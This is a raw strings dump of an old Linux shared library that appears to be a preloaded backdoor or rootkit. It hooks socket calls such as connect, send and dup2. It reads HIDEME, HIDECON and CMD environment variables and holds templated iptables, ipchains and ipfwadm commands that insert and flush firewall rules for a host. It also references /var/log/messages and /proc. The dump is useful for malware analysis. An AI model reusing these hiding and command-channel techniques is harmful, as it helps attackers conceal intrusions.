_DYNAMIC
_GLOBAL_OFFSET_TABLE_
__close
close
__send
send
__read
read
__write
write
_init
dlsym
connect
dup2
select
sendto
getenv
strlen
printf
malloc
sprintf
atoi
memset
memcpy
time
srand
rand
getsockname
strncpy
e_name_resolve
exit
ntohs
ntohl
htonl
htons
randbytes
_nss_read
scratch
_socket_option
uname
strncmp
inet_ntoa
system
fopen
perror
fseek
fgets
strstr
_nss_close
gethostbyname
getbigrand
getpid
pool
fread
fclose
opendir
readdir
stat
closedir
fwrite
libdl.so.2
libc.so.6
__xstat
_edata
__bss_start
_end
GLIBC_2.0
GLIBC_2.1
;P|r<
[^_]
[^_]
u(j!
u(j!
[^_]
QZ^&
-V8I
-o,y
close
connect
dup2
select
send
sendto
read
write
PORT
PRIME
UTC_OFFSET
HIDEME
HIDECON
warning:  CMD environment variable is not set.
oops:	CMD is too big to fit with protocol payload
Could not resolved RA=%s
Got a bad port RP=%s
iptables -A OUTPUT -p tcp -d %s/32 --tcp-flags  SYN SYN     -j ACCEPT ;
iptables -A OUTPUT -p tcp -d %s/32 --tcp-flags  ALL ACK,PSH -j ACCEPT ;
iptables -A OUTPUT -p tcp -d %s/32                          -j DROP   ;
iptables -F OUTPUT
ipchains -A output -p tcp ! -y -d %s/32 -j DENY -l
ipchains -F output
ipfwadm -O -a deny -P tcp -D %s/32 -k
ipfwadm -O -f
/var/log/messages
can't open /var/log/messages for read access
initial.fill
/proc
/proc/%s
/dev/urandom
9T}%
d"'2
stat.c
/usr/src/bs/BUILD/glibc-2.2.2/io/
gcc2_compiled.
int:t(0,1)=r(0,1);-2147483648;2147483647;
char:t(0,2)=r(0,2);0;127;
long int:t(0,3)=r(0,3);-2147483648;2147483647;
unsigned int:t(0,4)=r(0,4);0000000000000;0037777777777;
long unsigned int:t(0,5)=r(0,5);0000000000000;0037777777777;
long long int:t(0,6)=@s64;r(0,6);01000000000000000000000;0777777777777777777777;
long long unsigned int:t(0,7)=@s64;r(0,7);0000000000000;01777777777777777777777;
short int:t(0,8)=@s16;r(0,8);-32768;32767;
short unsigned int:t(0,9)=@s16;r(0,9);0;65535;
signed char:t(0,10)=@s8;r(0,10);-128;127;
unsigned char:t(0,11)=@s8;r(0,11);0;255;
float:t(0,12)=r(0,1);4;0;
double:t(0,13)=r(0,1);8;0;
long double:t(0,14)=r(0,1);12;0;
complex int:t(0,15)=s8real:(0,1),0,32;imag:(0,1),32,32;;
complex float:t(0,16)=r(0,16);8;0;
complex double:t(0,17)=r(0,17);16;0;
complex long double:t(0,18)=r(0,18);24;0;
__builtin_va_list:t(0,19)=*(0,20)=(0,20)
../include/libc-symbols.h
/usr/src/bs/BUILD/glibc-2.2.2/build-i386-linux/config.h
../include/sys/stat.h
../io/sys/stat.h
../include/features.h
../include/sys/cdefs.h
../misc/sys/cdefs.h
../sysdeps/unix/sysv/linux/bits/types.h
/usr/lib/gcc-lib/i386-redhat-linux/2.96/include/stddef.h
size_t:t(10,1)=(0,4)
__u_char:t(8,1)=(0,11)
__u_short:t(8,2)=(0,9)
__u_int:t(8,3)=(0,4)
__u_long:t(8,4)=(0,5)
__u_quad_t:t(8,5)=(0,7)
__quad_t:t(8,6)=(0,6)
__int8_t:t(8,7)=(0,10)
__uint8_t:t(8,8)=(0,11)
__int16_t:t(8,9)=(0,8)
__uint16_t:t(8,10)=(0,9)
__int32_t:t(8,11)=(0,1)
__uint32_t:t(8,12)=(0,4)
__int64_t:t(8,13)=(0,6)
__uint64_t:t(8,14)=(0,7)
__qaddr_t:t(8,15)=(8,16)=*(8,6)
__dev_t:t(8,17)=(8,5)
__uid_t:t(8,18)=(8,3)
__gid_t:t(8,19)=(8,3)
__ino_t:t(8,20)=(8,4)
__mode_t:t(8,21)=(8,3)
__nlink_t:t(8,22)=(8,3)
__off_t:t(8,23)=(0,3)
__loff_t:t(8,24)=(8,6)
__pid_t:t(8,25)=(0,1)
__ssize_t:t(8,26)=(0,1)
__rlim_t:t(8,27)=(8,4)
__rlim64_t:t(8,28)=(8,5)
__id_t:t(8,29)=(8,3)
__fsid_t:t(8,30)=(8,31)=s8__val:(8,32)=ar(8,33)=r(8,33);0000000000000;0037777777777;;0;1;(0,1),0,64;;
__daddr_t:t(8,34)=(0,1)
__caddr_t:t(8,35)=(8,36)=*(0,2)
__time_t:t(8,37)=(0,3)
__useconds_t:t(8,38)=(0,4)
__suseconds_t:t(8,39)=(0,3)
__swblk_t:t(8,40)=(0,3)
__clock_t:t(8,41)=(0,3)
__clockid_t:t(8,42)=(0,1)
__timer_t:t(8,43)=(0,1)
__key_t:t(8,44)=(0,1)
__ipc_pid_t:t(8,45)=(0,9)
__blksize_t:t(8,46)=(0,3)
__blkcnt_t:t(8,47)=(0,3)
__blkcnt64_t:t(8,48)=(8,6)
__fsblkcnt_t:t(8,49)=(8,4)
__fsblkcnt64_t:t(8,50)=(8,5)
__fsfilcnt_t:t(8,51)=(8,4)
__fsfilcnt64_t:t(8,52)=(8,5)
__ino64_t:t(8,53)=(8,5)
__off64_t:t(8,54)=(8,24)
__t_scalar_t:t(8,55)=(0,3)
__t_uscalar_t:t(8,56)=(0,5)
__intptr_t:t(8,57)=(0,1)
__socklen_t:t(8,58)=(0,4)
../linuxthreads/sysdeps/pthread/bits/pthreadtypes.h
../sysdeps/unix/sysv/linux/bits/sched.h
__sched_param:T(12,1)=s4__sched_priority:(0,1),0,32;;
_pthread_fastlock:T(11,1)=s8__status:(0,3),0,32;__spinlock:(0,1),32,32;;
_pthread_descr:t(11,2)=(11,3)=*(11,4)=xs_pthread_descr_struct:
__pthread_attr_s:T(11,5)=s36__detachstate:(0,1),0,32;__schedpolicy:(0,1),32,32;__schedparam:(12,1),64,32;__inheritsched:(0,1),96,32;__scope:(0,1),128,32;__guardsize:(10,1),160,32;__stackaddr_set:(0,1),192,32;__stackaddr:(0,19),224,32;__stacksize:(10,1),256,32;;
pthread_attr_t:t(11,6)=(11,5)
pthread_cond_t:t(11,7)=(11,8)=s12__c_lock:(11,1),0,64;__c_waiting:(11,2),64,32;;
pthread_condattr_t:t(11,9)=(11,10)=s4__dummy:(0,1),0,32;;
pthread_key_t:t(11,11)=(0,4)
pthread_mutex_t:t(11,12)=(11,13)=s24__m_reserved:(0,1),0,32;__m_count:(0,1),32,32;__m_owner:(11,2),64,32;__m_kind:(0,1),96,32;__m_lock:(11,1),128,64;;
pthread_mutexattr_t:t(11,14)=(11,15)=s4__mutexkind:(0,1),0,32;;
pthread_once_t:t(11,16)=(0,1)
_pthread_rwlock_t:T(11,17)=s32__rw_lock:(11,1),0,64;__rw_readers:(0,1),64,32;__rw_writer:(11,2),96,32;__rw_read_waiting:(11,2),128,32;__rw_write_waiting:(11,2),160,32;__rw_kind:(0,1),192,32;__rw_pshared:(0,1),224,32;;
pthread_rwlock_t:t(11,18)=(11,17)
pthread_rwlockattr_t:t(11,19)=(11,20)=s8__lockkind:(0,1),0,32;__pshared:(0,1),32,32;;
pthread_spinlock_t:t(11,21)=(0,1)
pthread_barrier_t:t(11,22)=(11,23)=s20__ba_lock:(11,1),0,64;__ba_required:(0,1),64,32;__ba_present:(0,1),96,32;__ba_waiting:(11,2),128,32;;
pthread_barrierattr_t:t(11,24)=(11,25)=s4__pshared:(0,1),0,32;;
pthread_t:t(11,26)=(0,5)
../include/time.h
../time/time.h
time_t:t(14,1)=(8,37)
dev_t:t(4,1)=(8,17)
gid_t:t(4,2)=(8,19)
ino_t:t(4,3)=(8,20)
mode_t:t(4,4)=(8,21)
nlink_t:t(4,5)=(8,22)
off_t:t(4,6)=(8,23)
uid_t:t(4,7)=(8,18)
blkcnt_t:t(4,8)=(8,47)
blksize_t:t(4,9)=(8,46)
../sysdeps/unix/sysv/linux/bits/stat.h
stat:T(16,1)=s88st_dev:(8,17),0,64;__pad1:(0,9),64,16;st_ino:(8,20),96,32;st_mode:(8,21),128,32;st_nlink:(8,22),160,32;st_uid:(8,18),192,32;st_gid:(8,19),224,32;st_rdev:(8,17),256,64;__pad2:(0,9),320,16;st_size:(8,23),352,32;st_blksize:(8,46),384,32;st_blocks:(8,47),416,32;st_atime:(8,37),448,32;__unused1:(0,5),480,32;st_mtime:(8,37),512,32;__unused2:(0,5),544,32;st_ctime:(8,37),576,32;__unused3:(0,5),608,32;__unused4:(0,5),640,32;__unused5:(0,5),672,32;;
stat64:T(16,2)=s96st_dev:(8,17),0,64;__pad1:(0,4),64,32;__st_ino:(8,20),96,32;st_mode:(8,21),128,32;st_nlink:(8,22),160,32;st_uid:(8,18),192,32;st_gid:(8,19),224,32;st_rdev:(8,17),256,64;__pad2:(0,4),320,32;st_size:(8,54),352,64;st_blksize:(8,46),416,32;st_blocks:(8,48),448,64;st_atime:(8,37),512,32;__unused1:(0,5),544,32;st_mtime:(8,37),576,32;__unused2:(0,5),608,32;st_ctime:(8,37),640,32;__unused3:(0,5),672,32;st_ino:(8,53),704,64;;
__stat:F(0,1)
file:p(0,21)=*(0,2)
buf:p(0,22)=*(16,1)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.1 2.96-81)
GCC: (GNU) 2.96 20000731 (Red Hat Linux 7.1 2.96-79)
01.01
01.01
01.01
01.01
01.01
.symtab
.strtab
.shstrtab
.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rel.got
.rel.plt
.plt
.text
.rodata
.data
.got
.dynamic
.sbss
.bss
.stab
.stabstr
.comment
.note
connect.c
gcc2_compiled.
pktlen
cmdsent
sys_close
sys_connect
sys_dup
sys_dup2
sys_select
sys_send
sys_sendto
sys_read
sys_write
sockset
filter
addcmd
munge
on.0
logwait
mpstrip.c
add3
mult
_socket_recvpair
_socket_recvmsg
_socket_sendpair
_socket_bind
_socket_sendmsg
_socket_shutdown
_socket_sendopt
_socket_recvopt
getrandhash.c
mixfun
padpool
md5.c
byteReverse
_nss_open
stat.c
__stat
stat
ntohl@@GLIBC_2.0
connect
pool
scratch
getpid@@GLIBC_2.0
_DYNAMIC
__write
_nss_close
__read
dlsym@@GLIBC_2.0
perror@@GLIBC_2.0
getenv@@GLIBC_2.0
dup2
htonl@@GLIBC_2.0
select
system@@GLIBC_2.0
send
inet_ntoa@@GLIBC_2.0
_init
malloc@@GLIBC_2.0
_nss_read
fread@@GLIBC_2.0
write
__send
__xstat@@GLIBC_2.0
fseek@@GLIBC_2.0
time@@GLIBC_2.0
fgets@@GLIBC_2.0
ntohs@@GLIBC_2.0
read
strstr@@GLIBC_2.0
strlen@@GLIBC_2.0
sendto
getbigrand
uname@@GLIBC_2.0
strncmp@@GLIBC_2.0
__bss_start
e_name_resolve
printf@@GLIBC_2.0
memcpy@@GLIBC_2.0
fclose@@GLIBC_2.1
getsockname@@GLIBC_2.0
closedir@@GLIBC_2.0
srand@@GLIBC_2.0
opendir@@GLIBC_2.0
gethostbyname@@GLIBC_2.0
exit@@GLIBC_2.0
atoi@@GLIBC_2.0
randbytes
__close
_edata
_GLOBAL_OFFSET_TABLE_
_end
htons@@GLIBC_2.0
memset@@GLIBC_2.0
strncpy@@GLIBC_2.0
fopen@@GLIBC_2.1
sprintf@@GLIBC_2.0
fwrite@@GLIBC_2.0
readdir@@GLIBC_2.0
_socket_option
rand@@GLIBC_2.0
close
